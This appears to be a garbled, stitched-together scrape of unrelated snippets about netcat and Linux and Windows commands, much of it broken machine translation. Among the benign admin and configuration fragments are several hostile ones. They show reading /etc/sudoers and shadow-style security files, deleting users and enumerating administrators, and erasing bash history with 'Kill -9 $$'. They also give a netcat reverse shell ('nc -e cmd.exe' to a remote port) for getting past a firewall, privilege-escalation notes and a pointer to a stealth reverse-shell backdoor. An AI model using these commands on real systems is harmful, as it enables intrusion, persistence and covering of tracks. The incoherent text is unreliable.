nc netcat

| Cat/etc/sudoers| Cat/etc/group| Cat/etc/security/group| Cat/etc/security/passwd| Cat/etc/security/user| Cat/etc/security/environ| Cat/etc/security/limits| Cat/usr/lib/security/mkuser. default| Cat/var/log/messages| Cat var/log/mysql. log| Cat/var/log/user. log| Cat/var/www/logs/error_log| Cat/etc/syslog. conf| Cat/etc/chttp. conf| Cat/etc/lighttpd. conf| Cat/etc/cups/cupsd. conf| Cat/etc/inetd. conf| Cat/etc/apache2/apache2.conf| Cat/var/log/apache2/error. log| Cat/etc/my. conf| Cat/etc/httpd

you, and delete the user name to make him beautiful,Net user username/delete Haha, he is no longer. Check whether he is an administrator. But let's check which users are in the Administrator group, so that users can be useful to us. Net localgroup administrators lists the members of the Administrator group. Then, let's look at the administrator user, because it was created when the system was created, so let's see when the system was created.Net user administrator, and then check the time when

the/var/account/pacct file. You can use the options to specify both the command name and user name. This is a GNU statistical tool. LastlogImportance: MediumLists the last logon times of all users on the system. It exists in the/var/log/lastlog file. LsofImportance: highList open files. This command will list all open files in a detailed table, including the file owner information, size, and information related to them. StraceImportance: MediumDiagnostic and debugging tools for tracking systems

: Find words that begin with a specific string cut, paste and join : Data modification fmt: Formatting text paragraphs pr: Formatting text into a page/column form fold: Several lines in the wrapped text column: Formatting text into multiple columns or tables expandand unexpand : Converting between tabs and spaces nl: Add line number seq: Printing numbers bc: Calculator factor: Decomposition factor gpg: Encrypt and sign files toe: Terminfo Entries List

several times to copy the data in the s receiving buffer. The recv function only copies the data, and the protocol is used to actually receive the data.) The recv function returns the actual number of bytes of the copy. If a recv error occurs during copy, SOCKET_ERROR is returned. If the recv function is interrupted while waiting for the Protocol to receive data, 0 is returned. 5. close Function Function prototype: int close (SOCKET s) Parameter description SOCKET s:

Check if the remote port is open for bash: NC-nvv $IP $PORTtelnet $IP $PORT Front and back switch for current task: Ctrl + ZFG The first 5 characters of the Intercept variable: ${variable:0:5} SSH Debug Mode: ssh -vvv [email protected]_addressssh with PEM key:ssh [email protected]_address-i KEY.PEM Monitoring log files tail -F $FILE _nameMultiple Monitored scriptsMulti_tail:#!/bin/SHfunctio

The day station is going to be a complete day. Often we can take the server Web services, but is updated than the Western reporters also faster than the administrator of the intranet infiltration of the seeds in the bud of the right to kill. The process of extracting power from Linux system involves not only the loopholes but also many system configurations. Here are some of the ways I have summed up the right.A few prerequisitesAlready got the low-power shell.The hacked machine has a very commo

prevent the last session from being logged in bash history: Kill-9 $$ Scan the network for open ports: Nmap-p 8081 172.20.0.0/16 Set up git email: git config--global user.email "me@111cn.net" To-sync with master If you have unpublished commits: Git pull--rebase Origin master Move files containing "TXT" in all file names into the/home/user directory: Find-iname "*txt*"-exec mv-v {}/home/user; To display files in line by row: Paste Test.txt Test1.txt The progress bar in the shell: PV

{ hosts =>" elasticsearch:9200 "#将logstash的输出到 Elasticsearch here to your own host } } And then we need to start the Kibana. Write a startup script to wait for Elasticserach to run successfully and start #!/usr/bin/env Bash # The Elasticsearch container to be ready before starting. echo "Stalling for Elasticsearch" while true; does nc-q 1 elasticsearch 9200 2>/dev/null break do Ne echo "starting Kibana" exec Kibana

can be separated by an intermediate gateway- K: Route packets with the list of computers specified by Computer-list. Consecutive computers cannot be separated by an intermediary gateway -w:timeout Specifies the time-out interval in milliseconds desination-list: Specifies that the remote computer to ping can roughly determine the target host operating system type by TTL value: Windows General TTL is between 100~130; Unix/linux between General 240~255 or 50~60.

Collect from different sources, aggregate logs, and transfer them to the storage system. Source is used to read data, can be a variety of clients, or from another agent, deposited into the channel,sink to consume, the entire process is asynchronous. The event is only deleted when it is successfully deposited into the channel of the next agent (multiple agents) or the final destination (a single agent), ensuring reliability. Channel has two kinds of files and memory. Multiple instances to

factor, while operating systems and networks are also the cause of outages, sans and RAID storage systems are not backup solutions.* When using the pipe command, the first advantage is that the output file is automatically compressed during execution and does not require any additional temporary disk space, which is helpful when disk space is limited, and the performer barThe command takes extra time to be its disadvantage, used in combination with mysqldump, locks all tables, affects applicati

command will scan a server to locate the open ports and locate the services associated with those ports. This is an important security tool to prevent the network from being hacked.ncDegree of importance: MediumThe NC (NETCAT) tool is a complete toolkit that you can use to connect and listen to TCP and UDP ports. It can be used as a diagnostic and test tool, or as a component of a script-based HTTP client

determine the type of firewall. • Interception of advertisements on fire walls. Although this method is not necessarily effective, some older firewalls may actually add some version information to the AD. Finally, there is a honeypot. These devices can be used to trap or "imprison" attackers, or perhaps to learn more about their activities. The honeypot is divided into two types: low interaction and high interaction. The honeypot can be detected by observing their function. A good low interac

The ping-based ICMP backdoor that was inadvertently seen while searching. So to the author's GitHub to see, incredibly is engraved, in order to level, can only endure to see, the student dog hurt. Fortunately it's easier to understand, as the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."Project address:https://github.com/andreafabrizi/prismPrism has only two main files, simple configuration, can be run on Linux,Solaris,AIX,bsd/mac,Android and man

: Kill-9 $$ Scan the network for open ports: Copy Code code as follows: Nmap-p 8081 172.20.0.0/16 Set up git email: Copy Code code as follows: git config--global user.email "me@example.com" To-sync with master If you have unpublished commits: Copy Code code as follows: Git pull--rebase Origin master Move files containing "TXT" in all file names into the/home/user directory: Copy Code code as follows:

HTTP ProxyConfigure HTTP_PROXY Environment variables directly git config http.proxy Http.proxy Override the HTTP proxy, normally configured using the Http_proxy, Https_proxy, and All_proxy Environment Variables (Curl (1)). This can is overridden on a per-remote Basis Remote. To configure a separate HTTPS proxy for a fixed remote Remote.For remotes so require curl (HTTP, HTTPS and FTP), the URL to the proxy to Remote. Set to the empty string to disable proxying for this remote. How to use: gi

(LISTENFD);if (setsockopt (LISTENFD, Sol_socket, SO_REUSEADDR, (void *) sock_opt,sizeof (sock_opt)) Perror ("setsockopt");Exit (1);}Bzero (servaddr, sizeof servaddr);servaddr.sin_family = af_inet;SERVADDR.SIN_ADDR.S_ADDR = htonl (Inaddr_any);Servaddr.sin_port = htons (1234);Bind (LISTENFD, (struct sockaddr*) servaddr, sizeof (SERVADDR));Listen (LISTENFD, 10); pid_t pid;PID = fork ();if (PID Perror ("fork");Exit (1);else if (PID = = 0)Worker_hander (LISTENFD);Worker_hander (LISTENFD);return 0;}

(the general firewall on the local SYN connection request does not intercept) Use tool Netcat to puncture this firewall: NC-E cmd.exe remote IP remote monitor port Subsequently, Port Multiplexing technology also appeared, the reuse of firewall open ports: such as 80,21,445 Typical backdoor like Hkdoor,ntrookit (the author is Chinese Yyt_hac) There is also the use of unwarranted port protocols for communica

output, if you want to use the tail command, the required file is large enough to see the outputExec.conf a1.sources = R1 a1.sinks = K1 a1.channels = C1 # describe/configure the source #a1. Sources.r1.type = Exec #a1. sources.r1.channels = C1 #a1. Sources.r1.command = tail-f/var/log/flume.log a1.sources.r1.type = Netcat a1.sources.r1.bind = localhost a1.sources.r1.port = 44444 # Describe the sink A1.sinks.k1.type = Logger # Use a channel which buf